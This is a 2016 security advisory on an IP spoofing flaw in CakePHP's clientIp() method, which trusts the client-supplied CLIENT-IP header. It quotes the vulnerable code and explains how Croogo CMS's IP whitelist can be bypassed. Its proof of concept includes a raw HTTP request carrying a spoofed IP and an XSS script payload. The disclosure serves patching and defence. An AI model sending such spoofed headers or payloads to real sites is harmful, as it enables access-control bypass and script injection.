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CakePHP Framework 3.2.4 - IP Spoofing

🗓️ 16 May 2016 00:00:00Reported by Dawid GolunskiType 
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CakePHP Framework 3.2.4 IP Spoofing vulnerability allows bypassing access control lists and injecting malicious data. It affects clientIp() method in both 2.x and 3.x branches

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- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================
 
  
I. VULNERABILITY
-------------------------
 
CakePHP Framework  <= 3.2.4      IP Spoofing Vulnerability
              3.1.11
              2.8.1
              2.7.10
              2.6.12
  
II. BACKGROUND
-------------------------
 
- CakePHP Framework
 
http://cakephp.org/
 
"CakePHP makes building web applications simpler, faster and require less code. 
 
CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer 
and a powerful scaffolding system that makes building both small and complex 
systems a breeze. "
 
  
III. INTRODUCTION
-------------------------
 
CakePHP Framework contains a vulnerability that allows to spoof the source IP 
address. This can allow to bypass access control lists, or injection of 
malicious data which, if treated as sanitized by an unaware CakePHP-based 
application, can lead to other vulnerabilities such as SQL injection, XSS, 
command injection etc.
 
 
IV. DESCRIPTION
-------------------------
  
Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based 
application. The is slightly different in each branch:
 
CakePHP 2.x:
 
------[ Cake/Network/CakeRequest.php ]------
 
        public function clientIp($safe = true) {
                if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
                        $ipaddr = preg_replace('/(?:,.*)/', '', env('HTTP_X_FORWARDED_FOR'));
                } else {
                        if (env('HTTP_CLIENT_IP')) {
                                $ipaddr = env('HTTP_CLIENT_IP');
                        } else {
                                $ipaddr = env('REMOTE_ADDR');
                        }
                }
 
                if (env('HTTP_CLIENTADDRESS')) {
                        $tmpipaddr = env('HTTP_CLIENTADDRESS');
 
                        if (!empty($tmpipaddr)) {
                                $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
                        }
                }
                return trim($ipaddr);
        }
 
--------------------------------------------
 
 
CakePHP 3.x:
 
------[ cakephp/src/Network/Request.php ]------
 
    /**
     * Get the IP the client is using, or says they are using.
     *
     * @return string The client IP.
     */
    public function clientIp()
    {
        if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
            $ipaddr = preg_replace('/(?:,.*)/', '', $this->env('HTTP_X_FORWARDED_FOR'));
        } else {
            if ($this->env('HTTP_CLIENT_IP')) {
                $ipaddr = $this->env('HTTP_CLIENT_IP');
            } else {
                $ipaddr = $this->env('REMOTE_ADDR');
            }
        }
 
        if ($this->env('HTTP_CLIENTADDRESS')) {
            $tmpipaddr = $this->env('HTTP_CLIENTADDRESS');
 
            if (!empty($tmpipaddr)) {
                $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
            }
        }
        return trim($ipaddr);
    }
 
--------------------------------------------
 
 
Both of the methods contain the same vulnerability. Despite the safe flag 
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they 
both use HTTP_CLIENT_IP request header (if it exists) instead of the 
REMOTE_ADDR variable set by the web server. 
 
The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request. 
 
  
V. PROOF OF CONCEPT EXPLOIT
-------------------------
  
 
A) Simple PoC
 
Download a vulnerable version of CakePHP framework and edit 
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:
 
 
-------[ src/Template/Pages/home.ctp ]--------
 
<?php
 
[...]
 
use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;
 
$this->layout = false;
 
if (!Configure::read('debug')):
    throw new NotFoundException();
endif;
 
$cakeDescription = 'CakePHP: the rapid development php framework';
 
echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
 
[...]
 
?>
 
----------------------------------------------
 
 
If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:
 
 
GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2
 
 
the application will give the following response:
 
 
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
 
PoC 
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
 
[...]
 
 
As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.
 
 
B) Croogo CMS exploit
 
An example application vulnerable to this bug is Croogo CMS:
 
https://croogo.org/
 
"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"
 
In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:
 
 
-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
 
 
/**
 * Check wether request is from a whitelisted IP address
 *
 * @see CakeRequest::addDetector()
 * @param $request CakeRequest Request object
 * @return boolean True when request is from a whitelisted IP Address
 */
        public static function isWhitelistedRequest(CakeRequest $request) {
                if (!$request) {
                        return false;
                }
                $clientIp = $request->clientIp();
                $whitelist = array_map(
                        'trim',
                        (array)explode(',', Configure::read('Site.ipWhitelist'))
                );
                return in_array($clientIp, $whitelist);
        }
 
-------------------------------------------------------------------
 
As we can see, it uses the affected clientIp() function from CakePHP framework.
 
 
VI. BUSINESS IMPACT
-------------------------
 
This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.
  
VII. SYSTEMS AFFECTED
-------------------------
 
According to the vendor, the following versions of CakePHP framework should be
affected by this issue.
 
3.1.11
3.2.4
2.8.1
2.7.10
2.6.12
 
  
VIII. SOLUTION
-------------------------
 
The vendor has released patched versions.
Install the latest version from the link below.
  
IX. REFERENCES
-------------------------
 
http://legalhackers.com
 
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
 
Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
 
http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
 
 
X. CREDITS
-------------------------
 
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
  
XI. REVISION HISTORY
-------------------------
 
12.05.2016 - Final advisory released
  
XII. LEGAL NOTICES
-------------------------
 
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

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16 May 2016 00:00Current
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